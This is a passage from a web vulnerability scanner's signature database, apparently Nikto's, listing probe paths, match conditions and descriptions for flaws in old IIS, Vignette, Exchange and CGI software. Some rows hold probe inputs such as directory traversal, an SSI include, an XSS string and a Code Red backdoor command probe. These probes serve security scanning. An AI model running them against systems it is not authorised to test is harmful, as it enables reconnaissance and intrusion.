available.\",\"\",\"\"\n\"000114\",\"\",\"23e\",\"/vgn/previewer\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000115\",\"\",\"23e\",\"/vgn/record/previewer\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000116\",\"\",\"23e\",\"/vgn/stylepreviewer\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000117\",\"\",\"23e\",\"/vgn/vr/Deleting\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000118\",\"\",\"23e\",\"/vgn/vr/Editing\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000119\",\"\",\"23e\",\"/vgn/vr/Saving\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000120\",\"\",\"23e\",\"/vgn/vr/Select\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000121\",\"MS02-028\",\"23\",\"/scripts/iisadmin/bdir.htr\",\"GET\",\"CODE:200\",\"This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\\<dir>.\",\"\",\"\"\n\"000122\",\"\",\"2a\",\"/scripts/iisadmin/ism.dll\",\"GET\",\"CODE:200\",\"Allows you to mount a brute force attack on passwords\",\"\",\"\"\n\"000123\",\"\",\"2a\",\"/scripts/tools/ctss.idc\",\"GET\",\"CODE:200\",\"This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.\",\"\",\"\"\n\"000124\",\"\",\"3\",\"/bigconf.cgi\",\"GET\",\"CODE:200\",\"BigIP Configuration CGI\",\"\",\"\"\n\"000125\",\"\",\"3\",\"/billing/billing.apw\",\"GET\",\"BODY:PASS BOX CAPTION:\",\"CoffeeCup password wizard allows password files to be read remotely.\",\"\",\"\"\n\"000126\",\"\",\"3\",\"/blah_badfile.shtml\",\"GET\",\"CODE:200\",\"Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.\",\"<!--#include virtual=\\\"/index.jsp\\\"-->\",\"\"\n\"000127\",\"\",\"3\",\"/blah-whatever-badfile.jsp\",\"GET\",\"BODY:Script \\/\",\"The web server is configured to respond with the web server path when requesting a non-existent .jsp file.\",\"\",\"\"\n\"000128\",\"CVE-2003-0401\",\"3\",\"/vgn/style\",\"GET\",\"CODE:200\",\"Vignette server may reveal system information through this file.\",\"\",\"\"\n\"000129\",\"\",\"3\",\"/scripts/no-such-file.pl\",\"GET\",\"BODY:perl script\",\"Using perl.exe allows attackers to view host info. Use perlis.dll instead.\",\"\",\"\"\n\"000130\",\"CVE-2002-1769\",\"3\",\"/SiteServer/Admin/commerce/foundation/domain.asp\",\"GET\",\"CODE:200\",\"Displays known domains of which that server is involved.\",\"\",\"\"\n\"000131\",\"CVE-2002-1769\",\"3\",\"/SiteServer/Admin/commerce/foundation/driver.asp\",\"GET\",\"CODE:200\",\"Displays a list of installed ODBC drivers.\",\"\",\"\"\n\"000132\",\"CVE-2002-1769\",\"3\",\"/SiteServer/Admin/commerce/foundation/DSN.asp\",\"GET\",\"CODE:200\",\"Displays all DSNs configured for selected ODBC drivers.\",\"\",\"\"\n\"000133\",\"CVE-2002-1769\",\"3\",\"/SiteServer/admin/findvserver.asp\",\"GET\",\"CODE:200\",\"Gives a list of installed Site Server components.\",\"\",\"\"\n\"000134\",\"\",\"3\",\"/SiteServer/Admin/knowledge/dsmgr/default.asp\",\"GET\",\"CODE:200\",\"Used to view current search catalog configurations\",\"\",\"\"\n\"000135\",\"CVE-2001-0987\",\"4\",\"@CGIDIRScgiwrap/%3Cfont%20color=red%3E\",\"GET\",\"BODY:<font color=red>\",\"cgiwrap allows HTML and possibly XSS injection.\",\"\",\"\"\n\"000136\",\"http://moinmo.in/MoinMoinDownload\",\"4\",\"@CGIDIRSmoin.cgi?test\",\"GET\",\"CODE:200\",\"MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability\",\"\",\"\"\n\"000138\",\"\",\"4\",\"/basilix/mbox-list.php3\",\"GET\",\"CODE:200\",\"BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page\",\"\",\"\"\n\"000139\",\"\",\"4\",\"/basilix/message-read.php3\",\"GET\",\"CODE:200\",\"BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page\",\"\",\"\"\n\"000140\",\"\",\"4\",\"/clusterframe.jsp\",\"GET\",\"CODE:200\",\"Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.\",\"\",\"\"\n\"000141\",\"\",\"4\",\"/IlohaMail/blank.html\",\"GET\",\"CODE:200\",\"IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.\",\"\",\"\"\n\"000142\",\"\",\"8\",\"/bb-dnbd/faxsurvey\",\"GET\",\"CODE:200\",\"This may allow arbitrary command execution.\",\"\",\"\"\n\"000143\",\"\",\"8\",\"/cartcart.cgi\",\"GET\",\"CODE:200\",\"If this is Dansie Shopping Cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"000144\",\"CVE-2001-0614\",\"8\",\"/scripts/Carello/Carello.dll\",\"GET\",\"CODE:200\",\"Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.\",\"\",\"\"\n\"000145\",\"\",\"a\",\"/scripts/tools/dsnform.exe\",\"GET\",\"CODE:200\",\"Allows creation of ODBC Data Source\",\"\",\"\"\n\"000146\",\"\",\"a\",\"/scripts/tools/dsnform\",\"GET\",\"CODE:200\",\"Allows creation of ODBC Data Source\",\"\",\"\"\n\"000147\",\"https://securitytracker.com/id/1003420\",\"a\",\"/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp\",\"GET\",\"CODE:200\",\"Microsoft Site Server script used to create, modify, and potentially delete LDAP users and groups.\",\"\",\"\"\n\"000148\",\"https://securitytracker.com/id/1003420\",\"a\",\"/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp\",\"GET\",\"CODE:200\",\"Microsoft Site Server used to create, modify, and potentially delete LDAP users and groups.\",\"\",\"\"\n\"000149\",\"\",\"b\",\"/prd.i/pgen/\",\"GET\",\"CODE:200\",\"Has MS Merchant Server 1.0\",\"\",\"\"\n\"000150\",\"\",\"b\",\"/readme.eml\",\"GET\",\"CODE:200\",\"Remote server may be infected with the Nimda virus.\",\"\",\"\"\n\"000151\",\"\",\"b\",\"/scripts/httpodbc.dll\",\"GET\",\"CODE:200\",\"Possible IIS backdoor found.\",\"\",\"\"\n\"000152\",\"\",\"b\",\"/scripts/proxy/w3proxy.dll\",\"GET\",\"CODE:502\",\"MSProxy v1.0 installed\",\"\",\"\"\n\"000153\",\"\",\"b\",\"/scripts/root.exe?/c+dir+c:\\+/OG\",\"GET\",\"BODY:Directory of c\",\"This machine is infected with Code Red, or has Code Red leftovers.\",\"\",\"\"\n\"000155\",\"\",\"1\",\"/siteseed/\",\"GET\",\"CODE:200\",\"Siteseed pre 1.4.2 have 'major' security problems.\",\"\",\"\"\n\"000156\",\"MS01-033\",\"2\",\"/scripts/samples/search/author.idq\",\"GET\",\"BODY:The template file can not be found in the location specified\",\"This is a default IIS script/file that should be removed.\",\"\",\"\"\n\"000157\",\"MS01-033\",\"2\",\"/scripts/samples/search/filesize.idq\",\"GET\",\"BODY:The template file can not be found in the location specified\",\"This is a default IIS script/file that should be removed.\",\"\",\"\"\n\"000158\",\"MS01-033\",\"2\",\"/scripts/samples/search/filetime.idq\",\"GET\",\"BODY:The template file can not be found in the location specified\",\"This is a default IIS script/file that should be removed.\",\"\",\"\"\n\"000159\",\"MS01-033\",\"2\",\"/scripts/samples/search/queryhit.idq\",\"GET\",\"BODY:The template file can not be found in the location specified\",\"This is a default IIS script/file that should be removed.\",\"\",\"\"\n\"000160\",\"MS01-033\",\"2\",\"/scripts/samples/search/simple.idq\",\"GET\",\"BODY:The template file can not be found in the location specified\",\"This is a default IIS script/file that should be removed.\",\"\",\"\"\n\"000161\",\"\",\"23\",\"/pccsmysqladm/incs/dbconnect.inc\",\"GET\",\"CODE:200\",\"This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.\",\"\",\"\"\n\"000162\",\"\",\"23e\",\"/iisadmin/\",\"GET\",\"CODE:200&&!BODY:is restricted to Localhost\",\"Access to /iisadmin should be restricted to localhost or allowed hosts only.\",\"\",\"\"\n\"000163\",\"\",\"3\",\"/password.inc\",\"GET\",\"BODY:globalpw\",\"GTCatalog 0.9 admin password was retrieved remotely.\",\"\",\"\"\n\"000164\",\"http://zodi.com/cgi-bin/shopper.cgi?display=intro&template=Intro/commerce.html\",\"3\",\"/PDG_Cart/order.log\",\"GET\",\"CODE:200\",\"PDG Commerce log found.\",\"\",\"\"\n\"000165\",\"\",\"3\",\"/web-console/ServerInfo.jsp%00\",\"GET\",\"BODY:<\\%=\",\"JBoss 3.2.1 with jetty seems to disclose source code.\",\"\",\"\"\n\"000166\",\"\",\"3\",\"/global.asa\",\"GET\",\"BODY:RUNAT\",\"The global.asa file was retrieved, which may contain sensitive information. Map the .asa extension to the proper dll.\",\"\",\"\"\n\"000167\",\"\",\"23\",\"/exchange/lib/AMPROPS.INC\",\"GET\",\"BODY:Logon functions\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000168\",\"\",\"23\",\"/exchange/lib/DELETE.INC\",\"GET\",\"BODY:deleting objects\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000169\",\"\",\"23\",\"/exchange/lib/GETREND.INC\",\"GET\",\"BODY:GetRenderer functions\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000170\",\"\",\"23\",\"/exchange/lib/GETWHEN.INC\",\"GET\",\"BODY:functions to construct\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000171\",\"\",\"23\",\"/exchange/lib/JSATTACH.INC\",\"GET\",\"BODY:Attachment Javascript\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000172\",\"\",\"23\",\"/exchange/lib/JSROOT.INC\",\"GET\",\"BODY:Javascript Functions\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000173\",\"\",\"23\",\"/exchange/lib/JSUTIL.INC\",\"GET\",\"BODY:Common Javascript\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000174\",\"\",\"23\",\"/exchange/lib/LANG.INC\",\"GET\",\"BODY:localized strings\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000175\",\"\",\"23\",\"/exchange/lib/logon.inc\",\"GET\",\"BODY:Logon functions\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000176\",\"\",\"23\",\"/exchange/lib/PAGEUTIL.INC\",\"GET\",\"BODY:functions that help\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000177\",\"\",\"23\",\"/exchange/lib/PUBFLD.INC\",\"GET\",\"BODY:Anonymous Published\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000178\",\"\",\"23\",\"/exchange/lib/RENDER.INC\",\"GET\",\"BODY:Rendering functions\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000179\",\"\",\"23\",\"/exchange/lib/SESSION.INC\",\"GET\",\"BODY:Session Management\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000180\",\"\",\"5\",\"/ows/restricted%2eshow\",\"GET\",\"CODE:200\",\"OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.\",\"\",\"\"\n\"000181\",\"http://www.westpoint.ltd.uk/advisories/wp-02-0002.txt\",\"5\",\"/WEB\\-INF./web.xml\",\"GET\",\"BODY:j2ee\",\"Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others.\",\"\",\"\"\n\"000182\",\"\",\"7\",\"/view_source.jsp\",\"GET\",\"CODE:200&&BODY:License Exception\",\"Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \\..\\ directory traversal. This script may be vulnerable.\",\"\",\"\"\n\"000183\",\"\",\"8\",\"/w-agora/\",\"GET\",\"CODE:200\",\"w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.\",\"\",\"\"\n\"000184\",\"CVE-2002-2320\",\"a\",\"/vider.php3\",\"GET\",\"CODE:200\",\"MySimpleNews may allow deleting of news items without authentication.\",\"\",\"\"\n\"000185\",\"\",\"a\",\"/exchange/root.asp?acs=anon\",\"GET\",\"BODY:\\/exchange\\/logonfrm\\.asp\",\"This allows anonymous access to portions of the OWA server.\",\"\",\"\"\n\"000186\",\"https://web.archive.org/web/20030607054822/http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc\",\"a\",\"/officescan/cgi/cgiChkMasterPwd.exe\",\"GET\",\"CODE:200\",\"Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.\",\"\",\"\"\n\"000187\",\"https://www.f-secure.com/v-descs/tanatos.shtml\",\"b\",\"/%NETHOOD%/\",\"GET\",\"BODY:Microsoft Windows Network\",\"The machine may be infected with the Bugbear.B virus.\",\"\",\"\"\n\"000189\",\"\",\"de\",\"@CGIDIRSbadmin.cgi\",\"GET\",\"CODE:200\",\"BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.\",\"\",\"\"\n\"000190\",\"CVE-2002-0098\",\"de\",\"@CGIDIRSboozt/admin/index.cgi?section=5&input=1\",\"GET\",\"CODE:200\",\"Boozt CGI may have a buffer overflow. Upgrade to a version newer than 0.9.8alpha.\",\"\",\"\"\n\"000191\",\"\",\"de\",\"@CGIDIRSezadmin.cgi\",\"GET\",\"CODE:200\",\"Some versions of this CGI are vulnerable to a buffer overflow.\",\"\",\"\"\n\"000192\",\"\",\"d\",\"@CGIDIRSezboard.cgi\",\"GET\",\"CODE:200\",\"Some versions of this CGI are vulnerable to a buffer overflow.\",\"\",\"\"\n\"000193\",\"\",\"d\",\"@CGIDIRSezman.cgi\",\"GET\",\"CODE:200\",\"Some versions of this CGI are vulnerable to a buffer overflow.\",\"\",\"\"\n\"000194\",\"CVE-2003-0762\",\"d\",\"@CGIDIRSfoxweb.dll\",\"GET\",\"CODE:200\",\"Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.\",\"\",\"\"\n\"000195\",\"CVE-2003-0762\",\"d\",\"@CGIDIRSfoxweb.exe\",\"GET\",\"CODE:200\",\"Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.\",\"\",\"\"\n\"000196\",\"\",\"d\",\"@CGIDIRSmgrqcgi\",\"GET\",\"CODE:200\",\"This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.\",\"\",\"\"\n\"000197\",\"\",\"d\",\"@CGIDIRSwconsole.dll\",\"GET\",\"CODE:200\",\"It may be possible to overflow this dll with 1024 bytes of data.\",\"\",\"\"\n\"000198\",\"\",\"d\",\"@CGIDIRSwebplus.exe?about\",\"GET\",\"BODY:Product Information\",\"Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability. Versions prior to 4.6 build 561 and 5.0 build 554 have a buffer overflow.\",\"\",\"\"\n\"000199\",\"MS00-094\",\"d\",\"/pbserver/pbserver.dll\",\"GET\",\"CODE:200\",\"This may contain a buffer overflow.\",\"\",\"\"\n\"000200\",\"\",\"0\",\"/administrator/gallery/uploadimage.php\",\"GET\",\"CODE:200\",\"Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.\",\"\",\"\"\n\"000201\",\"\",\"0\",\"/pafiledb/includes/team/file.php\",\"GET\",\"CODE:200\",\"paFileDB 3.1 and below may allow file upload without authentication.\",\"\",\"\"\n\"000202\",\"\",\"0\",\"/phpEventCalendar/file_upload.php\",\"GET\",\"CODE:200\",\"phpEventCalendar 1.1 and prior are vulnerable to file upload bug.\",\"\",\"\"\n\"000203\",\"\",\"0\",\"/servlet/com.unify.servletexec.UploadServlet\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"This servlet allows attackers to upload files to the server.\",\"\",\"\"\n\"000204\",\"\",\"0\",\"@CGIDIRSuploader.exe\",\"GET\",\"CODE:200\",\"This CGI allows attackers to upload files to the server and then execute them.\",\"\",\"\"\n\"000205\",\"\",\"0\",\"/scripts/cpshost.dll\",\"GET\",\"CODE:200\",\"Posting acceptor possibly allows you to upload files\",\"\",\"\"\n\"000206\",\"\",\"0\",\"/scripts/repost.asp\",\"GET\",\"BODY:Here is your upload status\",\"This allows uploads to /users. Create /users and give web user read only access.\",\"\",\"\"\n\"000207\",\"\",\"0\",\"/upload.asp\",\"GET\",\"CODE:200\",\"An ASP page that allows attackers to upload files to server\",\"\",\"\"\n\"000208\",\"\",\"0\",\"/uploadn.asp\",\"GET\",\"CODE:200\",\"An ASP page that allows attackers to upload files to server\",\"\",\"\"\n\"000209\",\"\",\"0\",\"/uploadx.asp\",\"GET\",\"CODE:200\",\"An ASP page that allows attackers to upload files to server\",\"\",\"\"\n\"000210\",\"\",\"0\",\"/wa.exe\",\"GET\",\"CODE:200\",\"An ASP page that allows attackers to upload files to server\",\"\",\"\"\n\"000211\",\"\",\"1\",\"/basilix/compose-attach.php3\",\"GET\",\"CODE:200\",\"BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads\",\"\",\"\"\n\"000212\",\"\",\"1\",\"/server/\",\"GET\",\"CODE:200\",\"Possibly Macromedia JRun or CRX WebDAV upload\",\"\",\"\"\n\"000213\",\"\",\"1\",\"@CGIDIRSfpsrvadm.exe\",\"GET\",\"CODE:200\",\"Potentially vulnerable CGI program.\",\"\",\"\"\n\"000214\",\"\",\"1be\",\"/siteminder/smadmin.html\",\"GET\",\"BODY:Admin Login\",\"SiteMinder admin login page available.\",\"\",\"\"\n\"000215\",\"\",\"1b\",\"/vgn/ac/data\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000216\",\"\",\"1b\",\"/vgn/ac/delete\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000217\",\"\",\"1b\",\"/vgn/ac/edit\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000218\",\"\",\"1b\",\"/vgn/ac/esave\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000219\",\"\",\"1b\",\"/vgn/ac/fsave\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000220\",\"\",\"1b\",\"/vgn/ac/index\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000221\",\"\",\"1b\",\"/vgn/asp/MetaDataUpdate\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000222\",\"\",\"1b\",\"/vgn/asp/previewer\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000223\",\"\",\"1b\",\"/vgn/asp/status\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000224\",\"\",\"1b\",\"/vgn/asp/style\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000225\",\"\",\"1b\",\"/vgn/errors\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000226\",\"\",\"1b\",\"/vgn/jsp/controller\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000227\",\"\",\"1b\",\"/vgn/jsp/errorpage\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000228\",\"\",\"1b\",\"/vgn/jsp/initialize\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000229\",\"\",\"1b\",\"/vgn/jsp/jspstatus\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000230\",\"\",\"1b\",\"/vgn/jsp/jspstatus56\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000231\",\"\",\"1b\",\"/vgn/jsp/metadataupdate\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000232\",\"\",\"1b\",\"/vgn/jsp/previewer\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000233\",\"\",\"1b\",\"/vgn/jsp/style\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000234\",\"\",\"1b\",\"/vgn/legacy/edit\",\"GET\",\"CODE:200\",\"Vignette CMS admin/maintenance script available.\",\"\",\"\"\n\"000235\",\"\",\"1b\",\"/vgn/login\",\"GET\",\"CODE:200\",\"Vignette server may allow user enumeration based on the login attempts to this file.\",\"\",\"\"\n\"000236\",\"\",\"2\",\"/webtop/wdk/samples/index.jsp\",\"GET\",\"BODY:WDK Fusion Samples\",\"Documentum Webtop Example Code\",\"\",\"\"\n\"000237\",\"\",\"2\",\"@CGIDIRS.cobalt\",\"GET\",\"CODE:200\",\"May allow remote admin of CGI scripts.\",\"\",\"\"\n\"000238\",\"\",\"2\",\"/WEB-INF/web.xml\",\"GET\",\"BODY:<web\\-app&&BODY:\\<servlet&&CODE:200\",\"JRUN default file found.\",\"\",\"\"\n\"000239\",\"https://seclists.org/bugtraq/2003/Apr/238\",\"23\",\"/forum/admin/wwforum.mdb\",\"GET\",\"CODE:200\",\"Web Wiz Forums password database found.\",\"\",\"\"\n\"000240\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"/fpdb/shop.mdb\",\"GET\",\"CODE:200\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"000241\",\"https://www.exploit-db.com/exploits/22484\",\"23\",\"/guestbook/admin/o12guest.mdb\",\"GET\",\"CODE:200\",\"Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.\",\"\",\"\"\n\"000242\",\"CVE-2002-1432\",\"23\",\"/midicart.mdb\",\"GET\",\"CODE:200\",\"MIDICART database is available for browsing. This should not be allowed via the web server.\",\"\",\"\"\n\"000243\",\"CVE-2002-1432\",\"23\",\"/MIDICART/midicart.mdb\",\"GET\",\"CODE:200\",\"MIDICART database is available for browsing. This should not be allowed via the web server.\",\"\",\"\"\n\"000244\",\"https://www.exploit-db.com/exploits/22513\",\"23\",\"/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb\",\"GET\",\"CODE:200\",\"MPCSoftWeb Guest Book passwords retrieved.\",\"\",\"\"\n\"000245\",\"\",\"23\",\"/news/news.mdb\",\"GET\",\"CODE:200\",\"Web Wiz Site News release v3.06 admin password database is available and unencrypted.\",\"\",\"\"\n\"000246\",\"CVE-2000-1036\",\"23\",\"/newuser?Image=../../database/rbsserv.mdb\",\"GET\",\"BODY:SystemErrorsPerHour\",\"The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000247\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"/vpasp/shopdbtest.asp\",\"GET\",\"BODY:xDatabase\",\"VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase).\",\"\",\"\"\n\"000248\",\"https://securitytracker.com/id/1004382\",\"23\",\"/shopping300.mdb\",\"GET\",\"CODE:200\",\"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.\",\"\",\"\"\n\"000249\",\"https://securitytracker.com/id/1004382\",\"23\",\"/shopping400.mdb\",\"GET\",\"CODE:200\",\"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.\",\"\",\"\"\n\"000250\",\"CVE-2002-1432\",\"23\",\"/shoppingdirectory/midicart.mdb\",\"GET\",\"CODE:200\",\"MIDICART database is available for browsing. This should not be allowed via the web server.\",\"\",\"\"\n\"000251\",\"https://web.archive.org/web/20011226154728/http://archives.neohapsis.com/archives/sf/pentest/2000-11/0147.html\",\"23\",\"/SilverStream/Meta/Tables/?access-mode=text\",\"GET\",\"BODY:_DBProduct\",\"The SilverStream database structure is available for remote viewing.\",\"\",\"\"\n\"000252\",\"https://www.medae.co/en/max/web-app\",\"23\",\"/database/db2000.mdb\",\"GET\",\"CODE:200\",\"Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.\",\"\",\"\"\n\"000253\",\"https://vulners.com/nessus/SAMBAR_MAILIT.NASL\",\"28\",\"@CGIDIRSmailit.pl\",\"GET\",\"CODE:200\",\"Sambar may allow anonymous email to be sent from any host via this CGI.\",\"\",\"\"\n\"000254\",\"\",\"3\",\"@CGIDIRSsearch\",\"GET\",\"BODY:=sourcedir\",\"Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value).\",\"\",\"\"\n\"000255\",\"\",\"3\",\"/doc/webmin.config.notes\",\"GET\",\"BODY:login and password\",\"Webmin config file found, may contain Webmin ID/Password. Typically runs on port 10000.\",\"\",\"\"\n\"000256\",\"\",\"3\",\"/error/HTTP_NOT_FOUND.html.var\",\"GET\",\"BODY:Available variants\",\"Apache reveals file system paths when invalid error documents are requested.\",\"\",\"\"\n\"000257\",\"\",\"3\",\"/oem_webstage/cgi-bin/oemapp_cgi\",\"GET\",\"BODY:This script\",\"Oracle reveals the CGI source by prepending /oem_webstage to CGI URLs.\",\"\",\"\"\n\"000258\",\"\",\"3\",\"@ADMINconfig.php\",\"GET\",\"CODE:200\",\"PHP Config file may contain database IDs and passwords.\",\"\",\"\"\n\"000259\",\"\",\"3\",\"@CGIDIRS.access\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"000260\",\"CVE-2002-0544\",\"3\",\"@CGIDIRS%2e%2e/abyss.conf\",\"GET\",\"CODE:200\",\"The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0.\",\"\",\"\"\n\"000261\",\"https://www.exploit-db.com/exploits/23009\",\"3\",\"@CGIDIRSdata/fetch.php?page=\",\"GET\",\"BODY:mysql_num_rows\",\"Stellar Docs allows remote users to see file system paths.\",\"\",\"\"\n\"000262\",\"\",\"3\",\"@CGIDIRSempower?DB=whateverwhatever\",\"GET\",\"BODY:db name whateverwhatever of directory \\/\",\"This CGI allows attackers to learn the full system path to your web directory.\",\"\",\"\"\n\"000263\",\"\",\"3\",\"@CGIDIRSmrtg.cgi?cfg=blah\",\"GET\",\"BODY:Cannot find the given config file\",\"Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000264\",\"CVE-2002-0215\",\"3\",\"@CGIDIRSstore/agora.cgi?page=whatever33.html\",\"GET\",\"BODY:FILE:\",\"Agora.cgi gives detailed error messages including file system paths.\",\"\",\"\"\n\"000265\",\"CVE-2003-1242\",\"3\",\"/?mod=node&nid=some_thing&op=view\",\"GET\",\"BODY:\\/node\\.module\\.php\",\"Sage 1.0b3 may reveal system paths with invalid module names.\",\"\",\"\"\n\"000266\",\"CVE-2003-1242\",\"3\",\"/?mod=some_thing&op=browse\",\"GET\",\"BODY:Cannot instantiate non\\-existent class\",\"Sage 1.0b3 reveals system paths with invalid module names.\",\"\",\"\"\n\"000267\",\"CVE-2002-0445\",\"3\",\"/article.php?article=4965&post=1111111111\",\"GET\",\"BODY:Unable to jump to row\",\"PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent.\",\"\",\"\"\n\"000268\",\"\",\"3\",\"/blah123.php\",\"GET\",\"BODY:Failed opening\",\"PHP is configured to give descriptive error messages that can reveal file system paths.\",\"\",\"\"\n\"000269\",\"CVE-2002-0446\",\"3\",\"/categorie.php3?cid=june\",\"GET\",\"BODY:Unable to jump to row\",\"Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent.\",\"\",\"\"\n\"000270\",\"CWE-552\",\"3\",\"/CFIDE/probe.cfm\",\"GET\",\"BODY:coldfusion\\.tagext\\.lang\",\"Cold Fusion file probe.cfm reveals system information, such as the path to the web server. In the 'Debugging Settings' page in the Administrator console, suppress the installation path displayed in error messages by selecting 'Enable Robust Exception Info\",\"\",\"\"\n\"000272\",\"\",\"3\",\"/download.php?op=viewdownload\",\"GET\",\"BODY:Failed opening\",\"PHP-Nuke allows file system paths to be revealed.\",\"\",\"\"\n\"000273\",\"\",\"3\",\"/download.php?op=viewdownload\",\"GET\",\"BODY:Fatal error\",\"PHP-Nuke allows file system paths to be 